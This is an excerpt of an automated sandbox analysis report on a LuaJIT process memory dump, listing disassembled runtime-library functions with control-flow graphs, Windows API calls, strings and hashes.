                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type_get_daylight
                                                      • String ID:
                                                      • API String ID: 1330151763-0
                                                      • Opcode ID: 9c6babcf131964b4a709adb186eeeb7abad8bdca1f25803fa6700e53adfe3286
                                                      • Instruction ID: 32f0b92b64fb3f996d3dcfcdc0431d3205475518ba761ab72d1048cc8a298733
                                                      • Opcode Fuzzy Hash: 9c6babcf131964b4a709adb186eeeb7abad8bdca1f25803fa6700e53adfe3286
                                                      • Instruction Fuzzy Hash: 98C1A237B24A42C5EB10DF6CC4902AC7761FBAAB99B944225EF2E97798CF78D451C310
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF7B1EBE1DC Relevance: 10.8, APIs: 7, Instructions: 291COMMONLIBRARYCODE
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 62 7ff7b1ebe1dc-7ff7b1ebe202 63 7ff7b1ebe204-7ff7b1ebe218 call 7ff7b1eaaed8 call 7ff7b1eaaef8 62->63 64 7ff7b1ebe21d-7ff7b1ebe221 62->64 80 7ff7b1ebe617 63->80 66 7ff7b1ebe600-7ff7b1ebe60c call 7ff7b1eaaed8 call 7ff7b1eaaef8 64->66 67 7ff7b1ebe227-7ff7b1ebe22e 64->67 86 7ff7b1ebe612 call 7ff7b1eb8b14 66->86 67->66 69 7ff7b1ebe234-7ff7b1ebe266 67->69 69->66 72 7ff7b1ebe26c-7ff7b1ebe273 69->72 75 7ff7b1ebe275-7ff7b1ebe287 call 7ff7b1eaaed8 call 7ff7b1eaaef8 72->75 76 7ff7b1ebe28c-7ff7b1ebe28f 72->76 75->86 78 7ff7b1ebe295-7ff7b1ebe297 76->78 79 7ff7b1ebe5fc-7ff7b1ebe5fe 76->79 78->79 84 7ff7b1ebe29d-7ff7b1ebe2a0 78->84 83 7ff7b1ebe61a-7ff7b1ebe631 79->83 80->83 84->75 87 7ff7b1ebe2a2-7ff7b1ebe2c8 84->87 86->80 90 7ff7b1ebe2ca-7ff7b1ebe2cd 87->90 91 7ff7b1ebe307-7ff7b1ebe30f 87->91 93 7ff7b1ebe2cf-7ff7b1ebe2d7 90->93 94 7ff7b1ebe2f5-7ff7b1ebe302 90->94 95 7ff7b1ebe311-7ff7b1ebe339 call 7ff7b1eba290 call 7ff7b1eb9294 * 2 91->95 96 7ff7b1ebe2d9-7ff7b1ebe2f0 call 7ff7b1eaaed8 call 7ff7b1eaaef8 call 7ff7b1eb8b14 91->96 93->94 93->96 99 7ff7b1ebe38b-7ff7b1ebe39e 94->99 123 7ff7b1ebe356-7ff7b1ebe387 call 7ff7b1ec0728 95->123 124 7ff7b1ebe33b-7ff7b1ebe351 call 7ff7b1eaaef8 call 7ff7b1eaaed8 95->124 127 7ff7b1ebe490 96->127 102 7ff7b1ebe3a0-7ff7b1ebe3a8 99->102 103 7ff7b1ebe41a-7ff7b1ebe424 call 7ff7b1eaa548 99->103 102->103 104 7ff7b1ebe3aa-7ff7b1ebe3ac 102->104 115 7ff7b1ebe42a-7ff7b1ebe43f 103->115 116 7ff7b1ebe4ae 103->116 104->103 108 7ff7b1ebe3ae-7ff7b1ebe3c5 104->108 108->103 112 7ff7b1ebe3c7-7ff7b1ebe3d3 108->112 112->103 117 7ff7b1ebe3d5-7ff7b1ebe3d7 112->117 115->116 121 7ff7b1ebe441-7ff7b1ebe453 GetConsoleMode 115->121 119 7ff7b1ebe4b3-7ff7b1ebe4d3 ReadFile 116->119 117->103 122 7ff7b1ebe3d9-7ff7b1ebe3f1 117->122 125 7ff7b1ebe5c6-7ff7b1ebe5cf GetLastError 119->125 126 7ff7b1ebe4d9-7ff7b1ebe4e1 119->126 121->116 128 7ff7b1ebe455-7ff7b1ebe45d 121->128 122->103 132 7ff7b1ebe3f3-7ff7b1ebe3ff 122->132 123->99 124->127 129 7ff7b1ebe5d1-7ff7b1ebe5e7 call 7ff7b1eaaef8 call 7ff7b1eaaed8 125->129 130 7ff7b1ebe5ec-7ff7b1ebe5ef 125->130 126->125 134 7ff7b1ebe4e7 126->134 131 7ff7b1ebe493-7ff7b1ebe49d call 7ff7b1eb9294 127->131 128->119 136 7ff7b1ebe45f-7ff7b1ebe481 ReadConsoleW 128->136 129->127 140 7ff7b1ebe5f5-7ff7b1ebe5f7 130->140 141 7ff7b1ebe489-7ff7b1ebe48b call 7ff7b1eaae88 130->141 131->83 132->103 139 7ff7b1ebe401-7ff7b1ebe403 132->139 143 7ff7b1ebe4ee-7ff7b1ebe503 134->143 145 7ff7b1ebe4a2-7ff7b1ebe4ac 136->145 146 7ff7b1ebe483 GetLastError 136->146 139->103 150 7ff7b1ebe405-7ff7b1ebe415 139->150 140->131 141->127 143->131 152 7ff7b1ebe505-7ff7b1ebe510 143->152 145->143 146->141 150->103 155 7ff7b1ebe512-7ff7b1ebe52b call 7ff7b1ebdda0 152->155 156 7ff7b1ebe537-7ff7b1ebe53f 152->156 164 7ff7b1ebe530-7ff7b1ebe532 155->164 157 7ff7b1ebe541-7ff7b1ebe553 156->157 158 7ff7b1ebe5b4-7ff7b1ebe5c1 call 7ff7b1ebdb58 156->158 161 7ff7b1ebe555 157->161 162 7ff7b1ebe5a7-7ff7b1ebe5af 157->162 158->164 165 7ff7b1ebe55a-7ff7b1ebe561 161->165 162->131 164->131 167 7ff7b1ebe563-7ff7b1ebe567 165->167 168 7ff7b1ebe59d-7ff7b1ebe5a1 165->168 169 7ff7b1ebe583 167->169 170 7ff7b1ebe569-7ff7b1ebe570 167->170 168->162 172 7ff7b1ebe589-7ff7b1ebe599 169->172 170->169 171 7ff7b1ebe572-7ff7b1ebe576 170->171 171->169 173 7ff7b1ebe578-7ff7b1ebe581 171->173 172->165 174 7ff7b1ebe59b 172->174 173->172 174->162
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: _invalid_parameter_noinfo
                                                      • String ID:
                                                      • API String ID: 3215553584-0
                                                      • Opcode ID: fed177e880270391593b347b1ec8381c866ee3668e23bdf448b2c5c867d7794d
                                                      • Instruction ID: 5863806ee258a1604af3e9d27389d1a6929b84c59bd6106b8c7dea0fddbca69e
                                                      • Opcode Fuzzy Hash: fed177e880270391593b347b1ec8381c866ee3668e23bdf448b2c5c867d7794d
                                                      • Instruction Fuzzy Hash: 72C1D822A1C78645E761AB19908027EAB51FFA3B8AFC44231FB4D07799DEFCE455C720
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF7B1DFF8B0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 166stringCOMMONLIBRARYCODE
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 175 7ff7b1dff8b0-7ff7b1dff8dc 177 7ff7b1dff8e2-7ff7b1dff8f4 175->177 178 7ff7b1dffbd0-7ff7b1dffbe2 call 7ff7b1df0950 175->178 179 7ff7b1dffb0b-7ff7b1dffb34 call 7ff7b1dff4a0 177->179 180 7ff7b1dff8fa-7ff7b1dff93f call 7ff7b1dfd090 177->180 185 7ff7b1dffbe4-7ff7b1dffbe8 178->185 188 7ff7b1dffb36-7ff7b1dffb53 call 7ff7b1df0a70 179->188 189 7ff7b1dffb58-7ff7b1dffb67 179->189 190 7ff7b1dff941-7ff7b1dff958 180->190 191 7ff7b1dff97f-7ff7b1dff989 180->191 188->185 195 7ff7b1dffb69-7ff7b1dffba5 call 7ff7b1e01360 189->195 196 7ff7b1dffba7-7ff7b1dffbc3 call 7ff7b1dff180 189->196 197 7ff7b1dff970-7ff7b1dff975 190->197 198 7ff7b1dff95a-7ff7b1dff96b call 7ff7b1dff1d0 190->198 193 7ff7b1dff996-7ff7b1dff9a8 191->193 194 7ff7b1dff98b-7ff7b1dff994 191->194 202 7ff7b1dff9b5-7ff7b1dff9e8 call 7ff7b1dff420 193->202 203 7ff7b1dff9aa-7ff7b1dff9b3 193->203 201 7ff7b1dff9f7-7ff7b1dffa07 194->201 195->185 196->178 197->185 198->197 209 7ff7b1dffa0d-7ff7b1dffa24 201->209 210 7ff7b1dffb09 201->210 206 7ff7b1dff9ed-7ff7b1dff9f2 202->206 203->206 206->201 213 7ff7b1dffa26-7ff7b1dffa37 call 7ff7b1dff1d0 209->213 214 7ff7b1dffa3c-7ff7b1dffa53 209->214 210->189 213->214 216 7ff7b1dffa55-7ff7b1dffa5a 214->216 217 7ff7b1dffa5f-7ff7b1dffa6b 214->217 216->185 218 7ff7b1dffa81-7ff7b1dffa85 217->218 219 7ff7b1dffa6d-7ff7b1dffa7f call 7ff7b1df0950 217->219 221 7ff7b1dffaa8-7ff7b1dffaba 218->221 222 7ff7b1dffa87-7ff7b1dffaa6 218->222 224 7ff7b1dffaea-7ff7b1dffaff call 7ff7b1dfd290 219->224 221->224 225 7ff7b1dffabc-7ff7b1dffad4 221->225 222->224 230 7ff7b1dffb04 224->230 226 7ff7b1dffad6 225->226 227 7ff7b1dffad8-7ff7b1dffae5 call 7ff7b1df0950 225->227 226->224 226->227 227->224 230->185
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: strrchr
                                                      • String ID: d
                                                      • API String ID: 3418686817-2564639436
                                                      • Opcode ID: d48147831702bd7bd43eec79edb916d25b6cc89b023425ac0650d085df72b790
                                                      • Instruction ID: 0f5f5975883f01d24d5f939a152f73207aabaf527e255b01c0a7640a233dfd62
                                                      • Opcode Fuzzy Hash: d48147831702bd7bd43eec79edb916d25b6cc89b023425ac0650d085df72b790
                                                      • Instruction Fuzzy Hash: BA914E2361CB8581DB609B19E49036EB760F7D6BA4F504232DBAD87BACDF7CD5448B10
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF7B1EB9BF4 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 50COMMONLIBRARYCODE
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: String$try_get_function
                                                      • String ID: LCMapStringEx
                                                      • API String ID: 1203122356-3893581201
                                                      • Opcode ID: fe23b64af8606f0a3c58e90187f372446aa5f227ab9bf59dc9e7446795e0f6b7
                                                      • Instruction ID: 3c9497af95d5aa11bb6fe974cda46c8232bb55495dac442e387c99fd929be75a
                                                      • Opcode Fuzzy Hash: fe23b64af8606f0a3c58e90187f372446aa5f227ab9bf59dc9e7446795e0f6b7
                                                      • Instruction Fuzzy Hash: B6113E71A08B8186D760DB59B4802AAB7A0FBDABD5F54423AEF8D53B5DCF7CD4408B40
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF7B1E06950 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38libraryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: AddressCallerLibraryLoadProc
                                                      • String ID: SystemFunction036$advapi32.dll
                                                      • API String ID: 4215043672-1354007664
                                                      • Opcode ID: 30b2f73f96f1acc817fbc38871702d57f699fdefbd6e4a561c2ccd7f055b506f
                                                      • Instruction ID: a9ae6212971a8bd50bf86412f2a5cfa283f5a5720f39a63f60a00308d5f3f1ad
                                                      • Opcode Fuzzy Hash: 30b2f73f96f1acc817fbc38871702d57f699fdefbd6e4a561c2ccd7f055b506f
                                                      • Instruction Fuzzy Hash: CB115631E1C64281FB50BB18E449375E3A0FBAA34AFD44131DB4E4299CDFBCE544C620
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF7B1E6F000 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 25libraryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,00007FF7B1E6EDD3), ref: 00007FF7B1E6F013
                                                      • LoadLibraryExA.KERNELBASE(?,?,?,?,?,?,00007FF7B1E6EDD3), ref: 00007FF7B1E6F034
                                                      • SetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7B1E317E7), ref: 00007FF7B1E6F061
                                                        • Part of subcall function 00007FF7B1E6EE80: GetLastError.KERNEL32 ref: 00007FF7B1E6EE96
                                                        • Part of subcall function 00007FF7B1E6EE80: FormatMessageA.KERNEL32 ref: 00007FF7B1E6EECA
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$FormatLibraryLoadMessage
                                                      • String ID: cannot load module '%s': %s
                                                      • API String ID: 3853237079-2554058836
                                                      • Opcode ID: df188ce702c3eb17da8a1c255447b51e67c1ee2f39d31328e8d2608fad6f4809
                                                      • Instruction ID: 9af3b0367e0582fd35ecf5ef585b2e41e073850632f7487f7d37b3f980783589
                                                      • Opcode Fuzzy Hash: df188ce702c3eb17da8a1c255447b51e67c1ee2f39d31328e8d2608fad6f4809
                                                      • Instruction Fuzzy Hash: 7EF04622A18A81C2E710EB18E84021AB770FBDA799F940135EB8C42A2CDF7CC1848A00
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF7B1E8D4E4 Relevance: 6.1, APIs: 4, Instructions: 94COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_initialize_crt__scrt_release_startup_lock
                                                      • String ID:
                                                      • API String ID: 1452418845-0
                                                      • Opcode ID: 8f06a7c1d25b1d9d4209a0557e7fbf7031a6169d9c2e25739453ee5eb69d5cde
                                                      • Instruction ID: b17b4e2f8e8a2f6b3745a95f23d78e5ebc551c21013e192c720080fbb55a2a60
                                                      • Opcode Fuzzy Hash: 8f06a7c1d25b1d9d4209a0557e7fbf7031a6169d9c2e25739453ee5eb69d5cde
                                                      • Instruction Fuzzy Hash: 2D313E21E0828686FB14BB6C94593B99291AF6378EFC54435E74D87ADFDEECA5048230
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF7B1E08C90 Relevance: 6.1, APIs: 4, Instructions: 54COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$QueryVirtual
                                                      • String ID:
                                                      • API String ID: 3696288210-0
                                                      • Opcode ID: f4a39bd2c8b4e77c2adc7d5054eb46406d13928e6223299f2622db2b8216fcc4
                                                      • Instruction ID: 911500e0af8439638fbc8428fef4cc2b3c1c65c68248007234406001cff3d4e2
                                                      • Opcode Fuzzy Hash: f4a39bd2c8b4e77c2adc7d5054eb46406d13928e6223299f2622db2b8216fcc4
                                                      • Instruction Fuzzy Hash: 51213521A1DA4181EB609B1DE445629B7B4FBA97D9F600335E78D427BCDF7CD440CB10
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF7B1DFFD90 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 370COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 333 7ff7b1dffd90-7ff7b1dffdb6 334 7ff7b1dffdd0-7ff7b1dffde2 333->334 335 7ff7b1dffdb8-7ff7b1dffdc8 333->335 336 7ff7b1dffde4-7ff7b1dffdf6 334->336 337 7ff7b1dffe3c-7ff7b1dffe4f 334->337 335->334 336->337 338 7ff7b1dffdf8-7ff7b1dffdfd 336->338 339 7ff7b1dffe55-7ff7b1dffe68 337->339 340 7ff7b1e0004b-7ff7b1e00067 337->340 343 7ff7b1dffe03-7ff7b1dffe15 338->343 344 7ff7b1dffeb0-7ff7b1dffee0 call 7ff7b1dff4a0 338->344 339->340 345 7ff7b1dffe6e-7ff7b1dffe73 339->345 341 7ff7b1e0008a-7ff7b1e0008f 340->341 342 7ff7b1e00069-7ff7b1e00085 340->342 348 7ff7b1e00091-7ff7b1e000a0 341->348 349 7ff7b1e000fb 341->349 347 7ff7b1e0010b-7ff7b1e0010f 342->347 343->344 350 7ff7b1dffe1b-7ff7b1dffe3a 343->350 357 7ff7b1dffee6-7ff7b1dfff0f call 7ff7b1dff4a0 344->357 358 7ff7b1dfff78-7ff7b1e00000 call 7ff7b1dff180 * 3 344->358 345->344 351 7ff7b1dffe75-7ff7b1dffe88 345->351 355 7ff7b1e00114-7ff7b1e00131 347->355 348->349 353 7ff7b1e000a2-7ff7b1e000be 348->353 354 7ff7b1e00103-7ff7b1e00107 349->354 350->337 350->344 351->344 356 7ff7b1dffe8a-7ff7b1dffeaa 351->356 353->349 359 7ff7b1e000c0-7ff7b1e000f9 353->359 354->347 360 7ff7b1e00154-7ff7b1e00159 355->360 361 7ff7b1e00133-7ff7b1e0014f 355->361 356->340 356->344 357->358 374 7ff7b1dfff11-7ff7b1dfff24 357->374 391 7ff7b1e00035-7ff7b1e00041 358->391 392 7ff7b1e00002-7ff7b1e0002d 358->392 359->354 363 7ff7b1e001c5 360->363 364 7ff7b1e0015b-7ff7b1e0016a 360->364 362 7ff7b1e001d5-7ff7b1e00201 361->362 370 7ff7b1e00203-7ff7b1e00213 362->370 371 7ff7b1e0022f-7ff7b1e00238 362->371 368 7ff7b1e001cd-7ff7b1e001d1 363->368 364->363 367 7ff7b1e0016c-7ff7b1e00188 364->367 367->363 373 7ff7b1e0018a-7ff7b1e001c3 367->373 368->362 370->355 375 7ff7b1e00219-7ff7b1e00229 370->375 376 7ff7b1e0024c-7ff7b1e002a0 call 7ff7b1dff250 call 7ff7b1dff2a0 371->376 377 7ff7b1e0023a-7ff7b1e00247 call 7ff7b1df0950 371->377 373->368 380 7ff7b1dfff26-7ff7b1dfff39 374->380 381 7ff7b1dfff3b-7ff7b1dfff47 374->381 375->355 375->371 396 7ff7b1e003b6-7ff7b1e003c3 call 7ff7b1dff2f0 376->396 397 7ff7b1e002a6-7ff7b1e002b5 376->397 377->376 380->381 385 7ff7b1dfff4f-7ff7b1dfff73 call 7ff7b1df0a70 380->385 381->385 395 7ff7b1e00467-7ff7b1e0046e 385->395 391->395 392->391 402 7ff7b1e003c8-7ff7b1e003e8 call 7ff7b1dff120 396->402 398 7ff7b1e002fd-7ff7b1e00302 397->398 399 7ff7b1e002b7-7ff7b1e002f8 call 7ff7b1e1e9c0 397->399 403 7ff7b1e00304-7ff7b1e00313 398->403 404 7ff7b1e0037d-7ff7b1e00381 398->404 411 7ff7b1e003b1 399->411 402->334 415 7ff7b1e003ee-7ff7b1e0040e 402->415 403->404 407 7ff7b1e00315-7ff7b1e00331 403->407 408 7ff7b1e00396-7ff7b1e003ac call 7ff7b1e32fe0 404->408 409 7ff7b1e00383-7ff7b1e00394 call 7ff7b1e11a40 404->409 407->404 413 7ff7b1e00333-7ff7b1e0037b call 7ff7b1e1e9c0 407->413 408->411 409->411 413->411 418 7ff7b1e00465 415->418 419 7ff7b1e00410-7ff7b1e00415 415->419 418->395 421 7ff7b1e00458-7ff7b1e00460 call 7ff7b1df8660 419->421 422 7ff7b1e00417-7ff7b1e00454 419->422 421->418 422->421
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $
                                                      • API String ID: 0-227171996
                                                      • Opcode ID: 9843a88858d80629a5392dfe685009a7de1f426911982b70ac98bb5915318121
                                                      • Instruction ID: 10abe5f3350729db729cdda96c4e26a57b01e19cd8c3f862998d77ffaa1c3351
                                                      • Opcode Fuzzy Hash: 9843a88858d80629a5392dfe685009a7de1f426911982b70ac98bb5915318121
                                                      • Instruction Fuzzy Hash: C6022336618B8585DB709B1DD49422EB3A0F79ABA8F504731EBAD877E9CF7CD4408B10
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF7B1DF30A0 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 128COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
